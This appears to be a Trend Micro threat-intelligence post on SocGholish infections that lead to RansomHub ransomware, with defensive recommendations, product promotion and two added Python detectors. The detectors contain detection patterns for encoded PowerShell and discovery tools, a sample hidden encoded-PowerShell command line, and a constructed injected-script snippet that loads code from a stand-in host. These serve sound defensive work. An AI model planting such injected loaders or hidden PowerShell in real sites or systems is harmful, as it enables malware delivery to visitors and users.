The Tactics of SocGholish’s Invasion Help in Spreading RansomHub Ransomware
Security Recommendations
Security and incident response teams should treat SocGholish infections as high-severity incidents and invoke their response procedures promptly to limit the follow-on activity it enables: backdoor deployment, unauthorized access to sensitive data, lateral movement across the network, data exfiltration, and destructive ransomware deployment. Defenders should also follow these recommended practices:
- Deploy extended detection and response (XDR) to quickly recognize, disrupt, and correlate malicious activity of the kind used in SocGholish attacks
- Reduce exposure to script-based malware such as SocGholish by:
  - Hardening endpoints and servers by blocking suspicious Windows Script Host (wscript.exe and cscript.exe) and PowerShell executions through policy-based controls such as Group Policy Objects
  - Trend Vision One customers can enable Attack Surface Reduction by ensuring “Behavior Monitoring and Predictive Machine Learning” are turned on in Endpoint and Server Policies
  - Enabling logging of Antimalware Scan Interface (AMSI) events to support investigations; AMSI captures script content at execution time, after the loader's obfuscation has been stripped and regardless of whether anything touched disk
  - Trend Vision One customers can query “TELEMETRY_AMSI_EXECUTE” events to reconstruct script executions during incident response
- Deploy web reputation services (WRS) on endpoints, cloud workloads, and proxy servers to identify and block malicious and anomalous traffic
- Use network intrusion detection and prevention systems, along with network detection and response (NDR), to gain visibility into network traffic
- Retire, or at minimum harden, segment, or isolate outdated operating systems, since adversaries target them during reconnaissance and lateral movement
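To make the process-chain detection opportunities above concrete, the following is an added example (not Trend Micro code and not a Vision One query) that runs three of them over constructed process-creation events: a script host launching a script from a user-writable directory, a shell spawned directly by that script host (raised to high severity when the PowerShell command line is encoded), and a discovery tool anywhere beneath a script host. The event fields, sample paths, and the base64 placeholder are assumptions; real telemetry such as Sysmon Event ID 1 carries the same parent/child and command-line data.

```python
"""
Toy process-chain detector for the SocGholish-style execution chain.
Added example, not Trend Micro code. Events are constructed to resemble
process-creation telemetry (Sysmon Event ID 1 or an EDR process event);
the field names and sample paths are assumptions.
"""
import re
from dataclasses import dataclass
from typing import Iterable, Iterator

# Script hosts that a fake "browser update" .js/.vbs runs under.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Living-off-the-land discovery tools commonly seen right after initial access.
DISCOVERY = {"whoami.exe", "nltest.exe", "net.exe", "net1.exe", "systeminfo.exe", "ipconfig.exe"}

# A script launched from Downloads or %TEMP% is how a downloaded "update" lands.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(downloads|appdata\\local\\temp)\\", re.I)
SCRIPT_EXT = re.compile(r"\.(js|jse|vbs|vbe|wsf)\b", re.I)
# -e / -ec / -enc / -EncodedCommand: encoded PowerShell payload.
ENCODED_PS = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s", re.I)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str


@dataclass(frozen=True)
class Finding:
    pid: int
    severity: str   # "medium" or "high"
    reason: str


def _name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _ancestors(ev: ProcEvent, by_pid: dict) -> Iterator[ProcEvent]:
    """Walk parent links, guarding against loops caused by PID reuse."""
    seen = set()
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        yield cur
        cur = by_pid.get(cur.ppid)


def detect(events: Iterable[ProcEvent]) -> list:
    events = list(events)
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = _name(e.image)
        chain = [_name(a.image) for a in _ancestors(e, by_pid)]  # nearest parent first
        if name in SCRIPT_HOSTS and SCRIPT_EXT.search(e.cmdline) and USER_WRITABLE.search(e.cmdline):
            findings.append(Finding(e.pid, "medium", "script host running a script from a user-writable directory"))
        elif name in SHELLS and chain and chain[0] in SCRIPT_HOSTS:
            sev = "high" if ENCODED_PS.search(e.cmdline) else "medium"
            findings.append(Finding(e.pid, sev, "shell spawned directly by a script host"))
        elif name in DISCOVERY and any(n in SCRIPT_HOSTS for n in chain):
            findings.append(Finding(e.pid, "high", "discovery tool descended from a script host"))
    return findings


# Constructed sample: a user runs "Update.js" from Downloads, the script host
# launches encoded PowerShell, which then runs discovery. Two benign admin
# actions are included to show they are not flagged.
SAMPLE_EVENTS = [
    ProcEvent(200, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(300, 200, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\Update.js"'),
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc QQBBAEEAQQA="),   # placeholder blob, not a real payload
    ProcEvent(500, 400, r"C:\Windows\System32\whoami.exe", "whoami /all"),
    ProcEvent(510, 400, r"C:\Windows\System32\nltest.exe", "nltest /dclist:"),
    # Benign: a domain logon script from SYSVOL, and an admin's own PowerShell script.
    ProcEvent(600, 200, r"C:\Windows\System32\cscript.exe",
              r"cscript.exe \\corp.example\sysvol\corp.example\scripts\logon.vbs"),
    ProcEvent(700, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\Scripts\inventory.ps1"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"pid {f.pid}: [{f.severity}] {f.reason}")
```

Tune USER_WRITABLE and DISCOVERY to the environment; the benign SYSVOL logon script and the admin's -File invocation in the sample show the kind of noise the parent and path conditions exist to exclude, and the ancestor walk is what lets a whoami.exe three levels down still be tied back to the script host.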
For their part, website owners and administrators should recognize that vulnerable content management systems (CMS) and their plugins are frequent targets, because a compromised site gives attackers a way to redirect visitor traffic, as SocGholish does, and distribute malware.
A compromised website can seriously disrupt a business if security products and browser block lists flag the site as malicious. Website administrators can reduce this risk by:
- Monitoring security advisories for the CMS and applying fixes and patches for its vulnerabilities
- Monitoring security advisories for CMS plugins and patching the vulnerabilities that are exploited for initial access to web servers
- Deploying a web application firewall (WAF) to filter exploit traffic
- Restricting access to administrative portals, for example by source IP address
- Requiring multi-factor authentication (MFA) and strong passwords for administrative panels
- Using SSH key authentication and not exposing administrative interfaces such as web host management consoles, control panels, and SSH to the internet
- Isolating and rebuilding compromised web servers to evict the threat actor after a compromise
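One practical check behind the "flagged as malicious" risk above is to snapshot the scripts a clean page serves and alert on anything new. The following added example is not Trend Micro code; it assumes an injection shows up in the served HTML as an extra script element (inline or external), and the two pages it compares are constructed for illustration with reserved .invalid hostnames.

```python
"""
Baseline-and-diff check for injected scripts on a served web page.
Added example, not Trend Micro code. Assumes the injected redirector lands in
the page HTML as a <script> element (inline or external); the HTML below is
constructed and the hostnames use the reserved .invalid TLD.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ScriptCollector(HTMLParser):
    """Collect (src, inline body) for every <script> element on the page."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._src = None
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:       # only while inside <script>...</script>
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append((self._src, "".join(self._buf).strip()))
            self._src, self._buf = None, None


def _script_identities(html: str) -> set:
    """External scripts are identified by host, same-origin ones by path,
    inline ones by the SHA-256 of their body."""
    p = _ScriptCollector()
    p.feed(html)
    p.close()
    ids = set()
    for src, body in p.scripts:
        if src:
            u = urlparse(src)               # handles absolute, protocol-relative and relative URLs
            ids.add(("host", u.netloc.lower()) if u.netloc else ("path", u.path))
        elif body:
            ids.add(("inline", hashlib.sha256(body.encode("utf-8")).hexdigest()))
    return ids


def baseline_from(clean_html: str) -> set:
    """Snapshot taken from a known-good copy of the page, e.g. right after a rebuild."""
    return _script_identities(clean_html)


def audit_page(served_html: str, baseline: set) -> list:
    """Return the scripts present now that were not in the baseline."""
    return sorted(_script_identities(served_html) - baseline)


# Constructed clean page: one same-origin script, one known CDN, one inline config block.
CLEAN_PAGE = """<!doctype html><html><head><title>Example Corp</title>
<script src="/assets/app.js"></script>
<script src="https://cdn.example.net/analytics.js"></script>
<script>window.siteConfig = {locale: "en"};</script>
</head><body><h1>Welcome</h1></body></html>"""

# The same page after a hypothetical injection: an extra external loader plus an
# inline snippet that pulls a second-stage script from another unknown host.
INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<script src="https://static.example-cdn.invalid/loader.js"></script>'
    '<script>var s=document.createElement("script");'
    's.src="//cdn2.example-cdn.invalid/x.js";document.head.appendChild(s);</script></body>',
)

if __name__ == "__main__":
    base = baseline_from(CLEAN_PAGE)
    for kind, value in audit_page(INJECTED_PAGE, base):
        print(f"new {kind} script: {value}")
```

Because inline scripts are matched by hash, a legitimate deploy that edits an inline block will also alert; treat the check as a tripwire that runs against the live site on a schedule and re-baseline after each intentional release. Note that the inline snippet is caught even though it never names its host in a src attribute, which is the case a pure host allowlist would miss.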
Being Proactive with Trend Vision One™
Trend Vision One™ is an enterprise cybersecurity platform that simplifies security and helps enterprises detect and stop threats faster by consolidating multiple security capabilities, providing better control over the enterprise’s attack surface, and offering a complete view of its cyber risk posture. This cloud-based platform uses artificial intelligence and threat intelligence from 250 million sensors and 16 threat research centers worldwide to deliver comprehensive risk insights, early threat detection, and automated risk and threat response in a single solution.
As noted above, Trend Vision One customers can reduce their exposure to these attacks by ensuring that “Behavior Monitoring and Predictive Machine Learning” are enabled in Endpoint and Server Policies.
Threat Intelligence with Trend Vision One
To stay ahead of evolving threats, Trend Vision One customers can access Intelligence Reports and Threat Insights within Vision One. Threat Insights helps customers prepare for emerging threats by providing detailed information about threat actors, their malicious activities, and their techniques. With this intelligence, customers can take proactive measures to protect their environments, mitigate risk, and respond effectively to threats.
The Trend Vision One Intelligence Reports App [IOC Sweeping]
- [AIM/MDR/IR][Spot Report] Ghoulish Tactics: Unmasking the SocGholish to Ransomhub Attack Chain
The Trend Vision One Threat Insights App
Hunting Queries
The Trend Vision One Search App
Trend Vision One customers can use the Search App to hunt for the malicious indicators referred to in this blog post within their environment.
Finding the initial dropper:
tags: ("XSAE.F11697" OR "XSAE.F11689" OR "XSAE.F8637" OR "XSAE.F8636" OR "XSAE.F7176")
Additional hunting queries are accessible for Trend Vision One customers with Threat Insights Entitlement enabled.
In Summary
SocGholish is a prevalent and evasive threat. The heavy obfuscation of its loader defeats static file detection, and its fileless execution of commands can sidestep detection technologies that depend on artifacts written to disk.
Because so many compromised websites lead to SocGholish, and because the operation uses a commercial traffic distribution system (TDS) to evade sandboxes and crawlers together with its own anti-sandbox measures, sandbox-based detection may never see the payload, allowing SocGholish to run inside production environments and lead to impactful attacks.
Its role as an access vector for well-known and dangerous RaaS operations such as RansomHub makes SocGholish a significant threat to enterprises. Nevertheless, there are many detection opportunities: suspicious process chains that perform discovery, lateral movement, credential access, and data exfiltration; outbound connections to low-reputation infrastructure; and unusual internal connections from compromised hosts.
Indicators of Compromise (IOCs)
Grab the list of IOCs here.
